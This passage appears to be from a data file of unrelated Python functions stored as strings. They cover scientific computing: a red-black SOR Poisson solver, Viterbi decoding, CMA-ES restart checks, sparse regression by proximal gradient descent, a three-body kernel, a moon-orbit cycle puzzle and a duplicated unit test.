\n \"\"\"\n #standard internal open node\n self.phi[1:self.ni-1,1:self.nj-1,1:self.nk-1] = \\\n (self.rho[1:self.ni-1,1:self.nj-1,1:self.nk-1]/self.EPS_0 +\\\n dx2*(self.phi[0:self.ni-2,1:self.nj-1,1:self.nk-1] + self.phi[2:self.ni,1:self.nj-1,1:self.nk-1])+\\\n dy2*(self.phi[1:self.ni-1,0:self.nj-2,1:self.nk-1] + self.phi[1:self.ni-1,2:self.nj,1:self.nk-1])+\\\n dz2*(self.phi[1:self.ni-1,1:self.nj-1,0:self.nk-2] + self.phi[1:self.ni-1,1:self.nj-1,2:self.nk]))/(2*dx2+2*dy2+2*dz2)\n \n \"\"\"\n \"\"\"\n # sucessive over relaxation \n self.phi[1:self.ni-1,1:self.nj-1,1:self.nk-1] = self.phi[1:self.ni-1,1:self.nj-1,1:self.nk-1] +\\\n 1.8*(self.phi_new[1:self.ni-1,1:self.nj-1,1:self.nk-1] - \\\n self.phi[1:self.ni-1,1:self.nj-1,1:self.nk-1])\n \"\"\"\n \n # Red point update\n self.phi[ir,jr,kr] = (1-w)*self.phi[ir,jr,kr] + (1.0/6.0)*w*(self.phi[ir+1,jr,kr] + self.phi[ir-1,jr,kr] +\\\n self.phi[ir,jr+1,kr] + self.phi[ir,jr-1,kr] +\\\n self.phi[ir,jr,kr+1] + self.phi[ir,jr,kr-1] +\\\n (self.rho[ir,jr,kr]/self.EPS_0)*(self.dh[0]*self.dh[1]))\n\n # Black point update\n self.phi[ib,jb,kb] = (1-w)*self.phi[ib,jb,kb] + (1.0/6.0)*w*(self.phi[ib+1,jb,kb] + self.phi[ib-1,jb,kb] +\\\n self.phi[ib,jb+1,kb] + self.phi[ib,jb-1,kb] +\\\n self.phi[ib,jb,kb+1] + self.phi[ib,jb,kb-1] +\\\n (self.rho[ib,jb,kb]/self.EPS_0)*(self.dh[0]*self.dh[1]))\n\n #check for convergence*/\n if it%25==0:\n sum = 0;\n \"\"\"\n for i in np.arange(1,self.ni-1):\n for j in np.arange(1,self.nj-1):\n for k in np.arange(1,self.nk-1):\n \"\"\"\n\n self.R[1:self.ni-1,1:self.nj-1,1:self.nk-1] = \\\n -self.phi[1:self.ni-1,1:self.nj-1,1:self.nk-1]*(2*dx2+2*dy2+2*dz2) +\\\n self.rho[1:self.ni-1,1:self.nj-1,1:self.nk-1]/self.EPS_0 +\\\n dx2*(self.phi[0:self.ni-2,1:self.nj-1,1:self.nk-1] + self.phi[2:self.ni,1:self.nj-1,1:self.nk-1]) +\\\n dy2*(self.phi[1:self.ni-1,0:self.nj-2,1:self.nk-1] + self.phi[1:self.ni-1,2:self.nj,1:self.nk-1]) +\\\n dz2*(self.phi[1:self.ni-1,1:self.nj-1,0:self.nk-2] + self.phi[1:self.ni-1,1:self.nj-1,2:self.nk])\n\n sum = np.sum(self.R**2)\n\n L2 = np.sqrt(sum/(self.ni*self.nj*self.nk));\n #print(\"iter: \"+str(it)+\", L2 = \"+str(L2))\n if (L2<tol):\n converged = True\n break\n\n if (converged==False):\n print(\"Gauss-Seidel failed to converge, L2 = \"+str(L2))\n \n return converged", "def viterbi(self):\n # initialisation\n self.phi = zeros((self.noOfEmmittingStates+2, self.T + 1))\n self.phi[0,0] = 1.0\n for i in range(1,self.noOfEmmittingStates+2):\n self.phi[i,0] = 0.0\n for t in range(1,self.T+1):\n self.phi[0,t] = 0.0\n self.traceback = zeros((self.noOfEmmittingStates+1, self.T+1))\n\n # main recursion\n for t in range(1, self.T + 1):\n for j in range(1, self.noOfEmmittingStates + 1):\n phiTemp = zeros((self.noOfEmmittingStates + 1, 1))\n for k in range(self.noOfEmmittingStates+1):\n phiTemp[k,0] = self.phi[k,t-1] * self.transitionMatrix[k, j-1]\n self.traceback[j-1,t-1] = nonzero(phiTemp == phiTemp.max(0))[0][0]\n self.phi[j, t] = phiTemp.max(0) * self.b[j-1, t-1]\n\n # last column - set states which can't reach term to 0, sub for term\n for j in range(1,self.noOfEmmittingStates + 1):\n if self.transitionMatrix[j,-1] == 0:\n self.phi[j,-1] = 0\n phiTemp = zeros((self.noOfEmmittingStates+1, 1))\n for k in range(self.noOfEmmittingStates + 1):\n phiTemp[k,0] = self.phi[k,-1] * self.transitionMatrix[k,-1]\n self.traceback[-1,-1] = nonzero(phiTemp == phiTemp.max(0))[0][0]\n self.phi[-1,-1] = phiTemp.max(0)", "def checkLocalRestartConditions(self, evalcount):\n\n if not self.local_restart:\n return False\n\n debug 
= False\n\n restart_required = False\n diagC = diag(self.C).reshape(-1, 1)\n tmp = append(abs(self.p_c), sqrt(diagC), axis=1)\n a = int(mod(evalcount/self.lambda_-1, self.n))\n\n # TolX\n if all(self.sigma*(max(tmp, axis=1)) < self.tolx):\n if debug:\n print('TolX')\n restart_required = True\n\n # TolUPX\n elif any(self.sigma*sqrt(diagC)) > self.tolupx:\n if debug:\n print('TolUPX')\n restart_required = True\n\n # No effective axis\n elif all(0.1*self.sigma*self.D[a, 0]*self.B[:, a] + self.wcm == self.wcm):\n if debug:\n print('noeffectaxis')\n restart_required = True\n\n # No effective coordinate\n elif any(0.2*self.sigma*sqrt(diagC) + self.wcm == self.wcm):\n if debug:\n print('noeffectcoord')\n restart_required = True\n\n # Condition of C\n elif cond(self.C) > self.conditioncov:\n if debug:\n print('condcov')\n restart_required = True\n\n elif mod(evalcount, self.lambda_) == self.nbin and \\\n max(self.histfunevals) - min(self.histfunevals) < self.tolfun:\n if debug:\n print('tolfun')\n restart_required = True\n\n # Adjust step size in case of equal function values\n elif self.is_fitness_flat:\n if debug:\n print('flatfitness')\n restart_required = True\n\n # A mismatch between sigma increase and decrease of all eigenvalues in C\n elif self.sigma / 1 > self.tolupsigma*max(self.D):\n if debug:\n print('tolupsigma')\n restart_required = True\n\n # Stagnation, median of most recent 20 best values is no better than that of the oldest 20 medians/generation\n elif len(self.stagnation_list) > 20 and len(self.recent_best_fitnesses) > 20 and \\\n median(self.stagnation_list[:20]) > median(self.recent_best_fitnesses):\n if debug:\n print('stagnation')\n restart_required = True\n\n return restart_required", "def run_grav(self):\n\n # Solucao direta\n self.prod_w = []\n self.prod_o = []\n t0 = time.time()\n # self.set_volumes_in_primal()\n self.set_sat_in()\n self.set_lamb_2()\n self.set_global_problem_vf_3_gr1_bif()\n self.Pf = self.solve_linear_problem(self.trans_fine, self.b, len(self.all_fine_vols_ic))\n self.organize_Pf()\n del self.Pf\n self.mb.tag_set_data(self.pf_tag, self.all_fine_vols, np.asarray(self.Pf_all))\n del self.Pf_all\n self.test_conservation_fine()\n # self.store_flux_pf_gr_bif = self.create_flux_vector_pf_gr_bif_1()\n\n \"\"\"\n ################################################################\n # Solucao Multiescala\n self.calculate_restriction_op_2()\n self.calculate_prolongation_op_het()\n self.organize_op()\n self.Tc = self.modificar_matriz(self.pymultimat(self.pymultimat(self.trilOR, self.trans_fine, self.nf_ic), self.trilOP, self.nf_ic), self.nc, self.nc)\n self.Qc = self.modificar_vetor(self.multimat_vector(self.trilOR, self.nf_ic, self.b), self.nc)\n self.Pc = self.solve_linear_problem(self.Tc, self.Qc, self.nc)\n self.set_Pc()\n self.Pms = self.multimat_vector(self.trilOP, self.nf_ic, self.Pc)\n\n del self.trilOP\n del self.trilOR\n del self.Tc\n del self.Qc\n del self.Pc\n\n self.organize_Pms()\n del self.Pms\n self.mb.tag_set_data(self.pms_tag, self.all_fine_vols, np.asarray(self.Pms_all))\n del self.Pms_all\n self.erro()\n\n self.test_conservation_coarse_gr()\n # self.Neuman_problem_6_gr()\n # self.store_flux_pms_gr = self.create_flux_vector_pms_gr()\n ####################################################################\n \"\"\"\n\n\n\n\n\n\n\n print('acaboooou')\n self.mb.write_file('new_out_bif_gr.vtk')\n\n\n shutil.copytree(self.caminho1, self.pasta)", "def PGD(Params, relaxationVars, fixedBs, fixedTs, data):\n Tol = Params[\"tol\"]\n TolCD = Params[\"tolCD\"]\n 
Lambda0 = Params[\"Lambda\"]\n Lambda1 = Params[\"alpha\"] * Lambda0\n M = Params[\"M\"]\n y = data.ycentered # data.y - data.ybar\n\n Bindices = relaxationVars.BActive.copy() # list\n Tindices = relaxationVars.TActive.copy() # list of tuples (i,j)\n currentB, currentT = relaxationVars.initialSol.ToArray(Bindices, Tindices)\n fixedB = fixedBs.copy() # Dict. key = index, value = 0 or 1 (no index if not fixed)\n fixedT = fixedTs.copy() # Dict. key = (i,j), value = 0 or 1 (no index if not fixed)\n DualInitial = relaxationVars.useDual\n\n # Store the index mappings\n Bmap = {} # Bmap[i] = index of i in currentB or XB\n for i in range(len(Bindices)):\n Bmap[Bindices[i]] = i\n\n Tmap = {} # Tmap[(i,j)] = index of interaction in XT and currentT\n for i in range(len(Tindices)):\n c1, c2 = Tindices[i]\n Tmap[(c1, c2)] = i\n Tmap[(c2, c1)] = i\n\n # Next: Some sanity checks (those can be removed if we're carful about the\n # inputs)\n\n # Make sure if B_i is fixed to 0 then all T_{ij}'s (in Tindices) are also\n # fixed to zero\n for i, val in fixedB.items():\n if val == 0:\n for l, j in Tmap:\n if l < j and (l == i or j == i):\n fixedT[(l, j)] = 0\n\n # Make sure if T_{ij} is fixed to 1 then both B_i and B_j are fixed to 1\n for key, val in fixedT.items():\n if val == 1:\n i, j = key\n fixedB[i] = 1\n fixedB[j] = 1\n\n # Delete from Bindices and Tindices all the indices s.t. z_i = 0 / z_{ij}\n # = 0\n Bzeros = []\n for i, val in fixedB.items():\n if val == 0:\n Bzeros.append(Bmap[i])\n for i in sorted(Bzeros, reverse=True):\n del Bindices[i]\n currentB = np.delete(currentB, Bzeros)\n\n Tzeros = []\n for key, val in fixedT.items():\n if val == 0:\n Tzeros.append(Tmap[key])\n for i in sorted(Tzeros, reverse=True):\n del Tindices[i]\n currentT = np.delete(currentT, Tzeros)\n\n # Update the index mappings\n Bmap = {} # Bmap[i] = index of i in currentB or XB\n for i in range(len(Bindices)):\n Bmap[Bindices[i]] = i\n\n Tmap = {} # Tmap[(i,j)] = index of interaction in XT and currentT\n for i in range(len(Tindices)):\n c1, c2 = Tindices[i]\n Tmap[(c1, c2)] = i\n Tmap[(c2, c1)] = i\n\n # End of sanity checks\n\n # Retrive the matrices of the optimization variables\n # Later: We can store the centered columns (but this will require twice\n # the memory)\n XB, XT = data.Retrieve(Bindices, Tindices)\n XBMean = XB.mean(axis=0)\n XB = XB - XBMean\n XTMean = XT.mean(axis=0)\n XT = XT - XTMean\n\n Bfree = [i for i in Bindices if i not in fixedB]\n Tfree = [(i, j) for i, j in Tmap if i < j and (i, j) not in fixedT]\n TfreeIndices = [Tmap[(i, j)]\n for i, j in Tmap if i < j and (i, j) not in fixedT]\n lenFixedB = len(Bindices) - len(Bfree)\n lenFixedT = len([key for key in fixedT if fixedT[key] == 1])\n\n # (Dual) Block CD Variables\n u = defaultdict(float)\n w = defaultdict(dict)\n if not DualInitial:\n for i in Bindices:\n u[i] = 0\n for pair in Tmap:\n i, j = pair\n w[i][j] = 0\n else:\n for i in Bindices:\n if i in relaxationVars.u and i not in fixedB:\n u[i] = relaxationVars.u[i]\n else:\n u[i] = 0\n for i, j in Tmap:\n if j in relaxationVars.w[i] and (min(i, j), max(\n i, j)) not in fixedT and i not in fixedB and j not in fixedB:\n w[i][j] = relaxationVars.w[i][j]\n else:\n # Important: we need w[i][j] = 0 if T_{ij} if fixed (this is\n # due to the thresholding function)\n w[i][j] = 0\n\n sortedIndices = {i: sorted(w[i]) for i in w}\n sortedIndices = defaultdict(list, sortedIndices)\n\n # Prepare all the fixed matrices/vectors required for grad evaluation\n # later.\n XBty = np.dot(XB.T, y)\n XBtXB = 
np.dot(XB.T, XB)\n XTty = np.dot(XT.T, y)\n XTtXT = np.dot(XT.T, XT)\n XBtXT = np.dot(XB.T, XT)\n\n # Compute the lipschitz constant of the grad.\n Xfull = np.hstack((XB, XT))\n if Xfull.shape[1] != 0:\n eigvals, v = np.linalg.eig(np.dot(Xfull.T, Xfull))\n L = np.max(np.real(eigvals))\n else:\n L = 1 # any value here should suffice - it's not used.\n\n # Compute the lipschitz constants for BCD.\n LCD = {}\n for i in Bindices:\n LCD[i] = (len(w[i]) + 1) * ((Lambda0**2) / (L * M**2))\n\n # Define the thresholding constants\n frac = Lambda0 / (M * L)\n Mpfrac = M + frac\n frac1 = Lambda1 / (M * L)\n Mpfrac1 = M + frac1\n fracsqL = frac * frac * L\n LambdaovM = Lambda0 / M\n Lambda1ovM = Lambda1 / M\n Lambda1ovLambda0 = Lambda1 / Lambda0\n\n start = time.time()\n\n oldObj = math.inf\n for it in range(5000):\n grad_B = - XBty + np.dot(XBtXB, currentB) + np.dot(XBtXT, currentT)\n grad_T = - XTty + np.dot(XTtXT, currentT) + np.dot(XBtXT.T, currentB)\n Bstar = currentB - grad_B / L\n Tstar = currentT - grad_T / L\n # Iterate over the blocks, running dual BCD.\n # We employ dual warm starts by using the same (u,w) across the PGD updates.\n CDPrevObj = -math.inf\n LCDCurrent = copy(LCD)\n useZeroSuffCondition = True\n if useZeroSuffCondition:\n # Perform proximal screening below.\n zeroGroups = set()\n for i in Bfree:\n zeroSufficient = False\n cumsum = 0\n for j in w[i]:\n thrshld = max(\n (abs(Tstar[Tmap[(i, j)]]) / frac - Lambda1ovLambda0), 0)\n # Do feature level screening below.\n if thrshld == 0:\n # The initialization below ensures that \\theta_{ij} is\n # never updated by BCA.\n w[i][j] = 0\n w[j][i] = 0\n else:\n cumsum += thrshld\n\n if cumsum <= 1 - abs(Bstar[Bmap[i]]) / frac:\n zeroSufficient = True\n if zeroSufficient:\n u[i] = Bstar[Bmap[i]] / frac\n for j in w[i]:\n if abs(Tstar[Tmap[(i, j)]]) > frac1:\n w[i][j] = Tstar[Tmap[(\n i, j)]] / frac - Lambda1ovLambda0 * np.sign(Tstar[Tmap[(i, j)]])\n else:\n w[i][j] = 0\n w[j][i] = 0\n # Not nec. 
but can improve speed.\n LCDCurrent[j] -= (Lambda0**2) / (L * M**2)\n zeroGroups.add(i)\n\n BfreeMinusZeroGroups = [i for i in Bfree if i not in zeroGroups]\n CDObjConst = 0\n '''\n for i in zeroGroups:\n CDObjConst += q(u[i], Bstar[Bmap[i]], M, Lambda0, L,frac)\n for j in w[i]:\n if i < j:\n # T(wij, wji, thetaij, M, Lambda0, L, frac, frac1, Mpfrac1, LambdaovM, Lambda1ovM)\n CDObjConst += T(w[i][j], w[j][i], Tstar[Tmap[(i,j)]], M, Lambda0, L,frac, frac1, Mpfrac1, LambdaovM, Lambda1ovM)\n '''\n ####\n else:\n zeroGroups = set()\n CDObjConst = 0\n BfreeMinusZeroGroups = Bfree\n # To Turn the part above off, comment it out and set the following:\n # zeroGroups = set()\n # CDObjConst = 0\n # BfreeMinusZeroGroups = Bfree\n\n for innerit in range(10000):\n # for i in Bfree:\n for i in BfreeMinusZeroGroups:\n # First, Calculate utilde and wtilde for ith block\n utilde = u[i] + delq(u[i],\n Bstar[Bmap[i]],\n M,\n Lambda0,\n L,\n frac,\n Mpfrac,\n fracsqL,\n LambdaovM) / LCDCurrent[i]\n\n #wtilde = {}\n # for j in w[i]:\n # if B_j is fixed to 1, then we already set w[j][i] = 0\n # wtilde[j] = w[i][j] + delT(w[i][j], w[j][i], Tstar[Tmap[(i,j)]], M, Lambda0, L,frac, Mpfrac, fracsqL, LambdaovM)/LCD[i]\n sortedIndicesi = sortedIndices[i]\n # delT(wij, wji, thetaij, M, Lambda0, L, frac, frac1, Mpfrac1, LambdaovM)\n wtilde = [w[i][j] + delT(w[i][j],\n w[j][i],\n Tstar[Tmap[(i,\n j)]],\n M,\n Lambda0,\n L,\n frac,\n frac1,\n Mpfrac1,\n LambdaovM) / LCDCurrent[i] for j in sortedIndicesi]\n\n x = np.empty(shape=len(wtilde) + 1)\n # Solve the l1 projection problem.\n x[0] = utilde\n x[1:] = np.array(wtilde)\n projection = project(x)\n # Update the solution.\n u[i] = projection[0]\n # for j in range(len(w[i])):\n # w[i][sortedIndicesi[j]] = projection[j+1] ## +1 since u[i] is\n # first\n for counter, j in enumerate(sortedIndicesi):\n w[i][j] = projection[counter + 1]\n # Calculate the current objective\n CDObj = CDObjConst # 0\n for i in BfreeMinusZeroGroups: # Bfree:\n CDObj += q(u[i], Bstar[Bmap[i]], M, Lambda0, L, frac)\n for j in w[i]:\n if i < j:\n # T(wij, wji, thetaij, M, Lambda0, L, frac, frac1, Mpfrac1, LambdaovM, Lambda1ovM)\n CDObj += T(w[i][j], w[j][i], Tstar[Tmap[(i, j)]], M,\n Lambda0, L, frac, frac1, Mpfrac1, LambdaovM, Lambda1ovM)\n #Params[\"print\"](\"Inner obj: \", CDObj)\n if terminate(CDPrevObj, CDObj, TolCD):\n break\n CDPrevObj = CDObj\n\n # Get back the primal solution.\n for i in range(len(Bindices)):\n # if Bindices[i] is fixed to 1, then u[Bindices[i]] = 0 and the\n # update below will lead to currentB[i] = Bstar[i] (or +- M)\n if Bindices[i] not in zeroGroups:\n # assuming Bindices is sorted\n currentB[i] = dualtoprimalu(\n u[Bindices[i]], Bstar[i], M, Lambda0, L, frac)\n else:\n currentB[i] = 0\n\n for i, j in Tmap:\n # if i or j is fixed, the corresponding w[i][j] will be zero, which\n # leads to the correct update.\n if i < j:\n if (i, j) in Tfree:\n # dualtoprimalw(wij, wji, thetaij, M, Lambda0, L, frac, frac1, Mpfrac1)\n if i in zeroGroups or j in zeroGroups:\n currentT[Tmap[(i, j)]] = 0\n else:\n currentT[Tmap[(i, j)]] = dualtoprimalw(\n w[i][j], w[j][i], Tstar[Tmap[(i, j)]], M, Lambda0, L, frac, frac1, Mpfrac1)\n else: # careful, this is the case when no thresholding should be applied\n coefficient = Tstar[Tmap[(i, j)]]\n if np.abs(coefficient) <= M:\n currentT[Tmap[(i, j)]] = coefficient\n else:\n currentT[Tmap[(i, j)]] = M * np.sign(coefficient)\n\n r = y - np.dot(XB, currentB) - np.dot(XT, currentT)\n\n maxterm = 0\n for i in range(len(currentB)):\n if Bindices[i] not in 
fixedB:\n maxtemp = np.abs(currentB[i])\n for j in w[Bindices[i]]:\n maxtemp = max(maxtemp, np.abs(\n currentT[Tmap[(Bindices[i], j)]]))\n maxterm += maxtemp\n l1norm = np.sum(np.abs(currentT[TfreeIndices]))\n # IMPORTANT: Avoid using lenFixed and lenFixedT here.....!!!!!! ####\n currentobjective = 0.5 * np.dot(r, r) + Lambda0 * (\n lenFixedB + lenFixedT) + (Lambda0 / M) * maxterm + (Lambda1 / M) * l1norm\n\n if currentobjective > oldObj:\n Params[\"print\"](\"Objective Increased!!!\")\n\n if terminate(oldObj, currentobjective, Tol):\n break\n\n oldObj = currentobjective\n Params[\"print\"](\"Iteration :\", it, \". Objective: \", currentobjective)\n\n end = time.time()\n Params[\"print\"](\"Time: \", end - start, \" seconds.\")\n\n # Check if any small values should be zero.\n # Start with more aggressive checks first.\n Trunc = False\n for epsilon in [0.01, 1e-3, 1e-4, 1e-5, 1e-6]:\n currentBtrunc = np.copy(currentB)\n currentTtrunc = np.copy(currentT)\n currentBSetToZero = np.nonzero(np.abs(currentB) < epsilon)[0]\n currentBtrunc[currentBSetToZero] = 0\n currentBSetToZeroPSet = set(currentBSetToZero)\n for (i, j) in Tmap:\n if Bmap[i] in currentBSetToZeroPSet or Bmap[j] in currentBSetToZeroPSet:\n currentTtrunc[Tmap[(i, j)]] = 0\n\n currentTtrunc[np.abs(currentT) < epsilon] = 0\n rtrunc = y - np.dot(XB, currentBtrunc) - np.dot(XT, currentTtrunc)\n maxterm = 0\n for i in range(len(currentBtrunc)):\n if Bindices[i] not in fixedB:\n maxtemp = np.abs(currentBtrunc[i])\n for j in w[Bindices[i]]:\n maxtemp = max(maxtemp, np.abs(\n currentTtrunc[Tmap[(Bindices[i], j)]]))\n maxterm += maxtemp\n l1norm = np.sum(np.abs(currentTtrunc[TfreeIndices]))\n objectivetrunc = 0.5 * np.dot(rtrunc, rtrunc) + Lambda0 * (\n lenFixedB + lenFixedT) + (Lambda0 / M) * maxterm + (Lambda1 / M) * l1norm\n\n Params[\"print\"](\n \"eps: \",\n epsilon,\n \" objectivetrunc: \",\n objectivetrunc,\n \" currentobjective: \",\n currentobjective)\n # 1.01 might be beneficial in some extreme cases where supp becomes\n # very large (but might also cause descent problems)\n if objectivetrunc <= currentobjective:\n '''\n currentB = currentBtrunc\n currentT = currentTtrunc\n r = rtrunc\n currentobjective = objectivetrunc\n '''\n Params[\"print\"](\"###CHANGE###\", \"eps: \", epsilon)\n Params[\"print\"](\"Final Objective :\", objectivetrunc)\n Trunc = True\n break\n\n integral = True\n\n for i in Bfree:\n zi = np.abs(currentB[Bmap[i]]) / M\n if zi > 0 and zi < 0.999:\n integral = False\n\n for i in TfreeIndices:\n zi = np.abs(currentT[i]) / M\n if zi > 0 and zi < 0.999:\n integral = False\n\n Bnnz = {key: currentB[Bmap[key]]\n for key in Bmap if currentB[Bmap[key]] != 0}\n Tnnz = {(i, j): currentT[Tmap[(i, j)]]\n for i, j in Tmap if i < j and currentT[Tmap[(i, j)]] != 0}\n intercept = data.ybar - np.dot(XBMean, currentB) - np.dot(XTMean, currentT)\n sol = Solution(Bnnz, Tnnz, intercept)\n\n if Trunc:\n BnnzTrunc = {key: currentBtrunc[Bmap[key]]\n for key in Bmap if currentBtrunc[Bmap[key]] != 0}\n TnnzTrunc = {(i, j): currentTtrunc[Tmap[(\n i, j)]] for i, j in Tmap if i < j and currentTtrunc[Tmap[(i, j)]] != 0}\n interceptTrunc = data.ybar - \\\n np.dot(XBMean, currentBtrunc) - np.dot(XTMean, currentTtrunc)\n solTrunc = Solution(BnnzTrunc, TnnzTrunc, interceptTrunc)\n else:\n BnnzTrunc = Bnnz\n TnnzTrunc = Tnnz\n interceptTrunc = intercept\n solTrunc = sol\n\n return (sol, solTrunc, currentobjective, integral, r, u, w)", "def three_body_mc_force_en_jit(bond_array_1, c1, etypes1,\n bond_array_2, c2, etypes2,\n cross_bond_inds_1, 
cross_bond_inds_2,\n cross_bond_dists_1, cross_bond_dists_2,\n triplets_1, triplets_2,\n d1, sig, ls, r_cut, cutoff_func,\n nspec, spec_mask, triplet_mask):\n\n kern = 0\n\n # pre-compute constants that appear in the inner loop\n sig2 = sig * sig\n ls1 = 1 / (2 * ls * ls)\n ls2 = 1 / (ls * ls)\n\n bc1 = spec_mask[c1]\n bc1n = nspec * nspec * bc1\n\n for m in range(bond_array_1.shape[0]):\n ri1 = bond_array_1[m, 0]\n ci1 = bond_array_1[m, d1]\n fi1, fdi1 = cutoff_func(r_cut, ri1, ci1)\n ei1 = etypes1[m]\n\n bei1 = spec_mask[ei1]\n bei1n = nspec * bei1\n\n for n in range(triplets_1[m]):\n ind1 = cross_bond_inds_1[m, m + n + 1]\n ri2 = bond_array_1[ind1, 0]\n ci2 = bond_array_1[ind1, d1]\n fi2, fdi2 = cutoff_func(r_cut, ri2, ci2)\n ei2 = etypes1[ind1]\n\n bei2 = spec_mask[ei2]\n\n ttypei = triplet_mask[bc1n + bei1n + bei2]\n\n tls1 = ls1[ttypei]\n tls2 = ls2[ttypei]\n tsig2 = sig2[ttypei]\n\n ri3 = cross_bond_dists_1[m, m + n + 1]\n fi3, _ = cutoff_func(r_cut, ri3, 0)\n\n fi = fi1 * fi2 * fi3\n fdi = fdi1 * fi2 * fi3 + fi1 * fdi2 * fi3\n\n for p in range(bond_array_2.shape[0]):\n rj1 = bond_array_2[p, 0]\n fj1, _ = cutoff_func(r_cut, rj1, 0)\n ej1 = etypes2[p]\n\n for q in range(triplets_2[p]):\n ind2 = cross_bond_inds_2[p, p + q + 1]\n rj2 = bond_array_2[ind2, 0]\n fj2, _ = cutoff_func(r_cut, rj2, 0)\n ej2 = etypes2[ind2]\n rj3 = cross_bond_dists_2[p, p + q + 1]\n fj3, _ = cutoff_func(r_cut, rj3, 0)\n fj = fj1 * fj2 * fj3\n\n r11 = ri1 - rj1\n r12 = ri1 - rj2\n r13 = ri1 - rj3\n r21 = ri2 - rj1\n r22 = ri2 - rj2\n r23 = ri2 - rj3\n r31 = ri3 - rj1\n r32 = ri3 - rj2\n r33 = ri3 - rj3\n\n if (c1 == c2):\n if (ei1 == ej1) and (ei2 == ej2):\n kern += three_body_en_helper(ci1, ci2, r11, r22,\n r33, fi, fj, fdi,\n tls1,\n tls2, tsig2)\n if (ei1 == ej2) and (ei2 == ej1):\n kern += three_body_en_helper(ci1, ci2, r12, r21,\n r33, fi, fj, fdi,\n tls1,\n tls2, tsig2)\n if (c1 == ej1):\n if (ei1 == ej2) and (ei2 == c2):\n kern += three_body_en_helper(ci1, ci2, r13, r21,\n r32, fi, fj, fdi,\n tls1,\n tls2, tsig2)\n if (ei1 == c2) and (ei2 == ej2):\n kern += three_body_en_helper(ci1, ci2, r11, r23,\n r32, fi, fj, fdi,\n tls1,\n tls2, tsig2)\n if (c1 == ej2):\n if (ei1 == ej1) and (ei2 == c2):\n kern += three_body_en_helper(ci1, ci2, r13, r22,\n r31, fi, fj, fdi,\n tls1,\n tls2, tsig2)\n if (ei1 == c2) and (ei2 == ej1):\n kern += three_body_en_helper(ci1, ci2, r12, r23,\n r31, fi, fj, fdi,\n tls1,\n tls2, tsig2)\n\n return kern", "def main():\n moons = initialize_moons()\n\n # Do it again, to get a stable initial set of values to compare against.\n initial_state = initialize_moons()\n needed_cycles = [0] * 3\n\n # Because in the mechanics of this fake universe gravity and velocity in\n # one dimension do not affect anything in the other two dimensions, we\n # can loop altering one dimension at a time until\n for dimension in (Position3d.X, Position3d.Y, Position3d.Z):\n Position3d.set_dimension(dimension)\n cycled = False\n cycle_count = 0\n while not cycled:\n if cycle_count > 30000000000:\n print(\"bailing!\")\n break\n cycle_count += 1\n for moon in moons:\n for other_moon in moons:\n if moon is other_moon:\n continue\n moon.apply_gravity(other_moon)\n for moon in moons:\n moon.apply_velocity()\n match = True\n for idx, moon in enumerate(moons):\n if moon != initial_state[idx]:\n # Didn't complete a cycle back to original state for this\n # dimension. Try again.\n match = False\n break\n if match:\n # Yea! 
Done with this dimension\n needed_cycles[dimension] = cycle_count\n cycled = True\n\n print(lcm(needed_cycles[2], lcm(needed_cycles[0], needed_cycles[1])),\n \"cycles needed to loop.\")\n print(\"Hawking would be proud.\")", "def test_linear_in_cond(self):\n # reproducible arbitrariness\n np.random.seed(3232)\n\n cond_out = np.random.randn(self.Nc)\n alpha = 2.3\n\n self.conductor.out_step = np.copy(cond_out)\n self.tutor.out_step = self.rule.theta + 10*np.random.randn(self.Ns)\n\n W0 = np.copy(self.syns.W)\n\n sim = simulation.Simulation(self.conductor, self.student, self.tutor,\n self.syns, self.rule, dt=self.dt)\n sim.run(self.dt)\n\n change1 = self.syns.W - W0\n\n self.syns.W = np.copy(W0)\n self.conductor.out_step = alpha*cond_out\n sim.run(self.dt)\n\n change2 = self.syns.W - W0\n\n self.assertTrue(np.allclose(change2, alpha*change1))", "def test_linear_in_cond(self):\n # reproducible arbitrariness\n np.random.seed(3232)\n\n cond_out = np.random.randn(self.Nc)\n alpha = 2.3\n\n self.conductor.out_step = np.copy(cond_out)\n self.tutor.out_step = self.rule.theta + 10*np.random.randn(self.Ns)\n\n W0 = np.copy(self.syns.W)\n\n sim = simulation.Simulation(self.conductor, self.student, self.tutor,\n self.syns, self.rule, dt=self.dt)\n sim.run(self.dt)\n\n change1 = self.syns.W - W0\n\n self.syns.W = np.copy(W0)\n self.conductor.out_step = alpha*cond_out\n sim.run(self.dt)\n\n change2 = self.syns.W - W0\n\n self.assertTrue(np.allclose(change2, alpha*change1))", "def __ge__(self, *args):\n return _ida_hexrays.cwhile_t___ge__(self, *args)", "def potentialSolver3(self, w, max_it, tol):\n\n dx2 = 1.0/(self.dh[0]*self.dh[0]); # dx^2\n dy2 = 1.0/(self.dh[1]*self.dh[1]); # dy^2\n dz2 = 1.0/(self.dh[2]*self.dh[2]); # dz^2\n \n L2 = 0.0 # norm\n \n converged = False\n \n # Step 1: create *integer* array the same size as u \n x = np.zeros_like(self.phi,dtype=np.int)\n\n # Step 2: populate all non-boundary cells with running numbers from 1 to (n-2)^2\n x[1:-1,1:-1,1:-1] = np.arange(1,(self.ni-2)*(self.nj-2)*(self.nk-2)+1).reshape(self.ni-2,self.nj-2,self.nk-2)\n\n # Step 3: get indices of even (red) and odd (black) points\n ir, jr, kr = np.where((x>0) & (x%2 == 0)) # indices of red pts = indices of even numbers\n ib, jb, kb = np.where((x>0) & (x%2 == 1)) # indices of black pts = indices of odd numbers\n\n\n \n # solve potential\n for it in np.arange(1,max_it+1):\n \"\"\"\n for i in np.arange(1,self.ni-1):\n for j in np.arange(1,self.nj-1):\n for k in np.arange(1,self.nk-1):\n \"\"\" \n \"\"\"\n #standard internal open node\n phi_new = (self.rho[i][j][k]/self.EPS_0 +\\\n dx2*(self.phi[i-1][j][k] + self.phi[i+1][j][k]) +\\\n dy2*(self.phi[i][j-1][k] + self.phi[i][j+1][k]) +\\\n dz2*(self.phi[i][j][k-1] + self.phi[i][j][k+1]))/(2*dx2+2*dy2+2*dz2)\n \n # sucessive over relaxation \n self.phi[i,j,k] = self.phi[i,j,k] + 1.4*(phi_new - self.phi[i][j][k])\n \n \"\"\" \n \n \"\"\"\n #standard internal open node\n self.phi[1:self.ni-1,1:self.nj-1,1:self.nk-1] = \\\n (self.rho[1:self.ni-1,1:self.nj-1,1:self.nk-1]/self.EPS_0 +\\\n dx2*(self.phi[0:self.ni-2,1:self.nj-1,1:self.nk-1] + self.phi[2:self.ni,1:self.nj-1,1:self.nk-1])+\\\n dy2*(self.phi[1:self.ni-1,0:self.nj-2,1:self.nk-1] + self.phi[1:self.ni-1,2:self.nj,1:self.nk-1])+\\\n dz2*(self.phi[1:self.ni-1,1:self.nj-1,0:self.nk-2] + 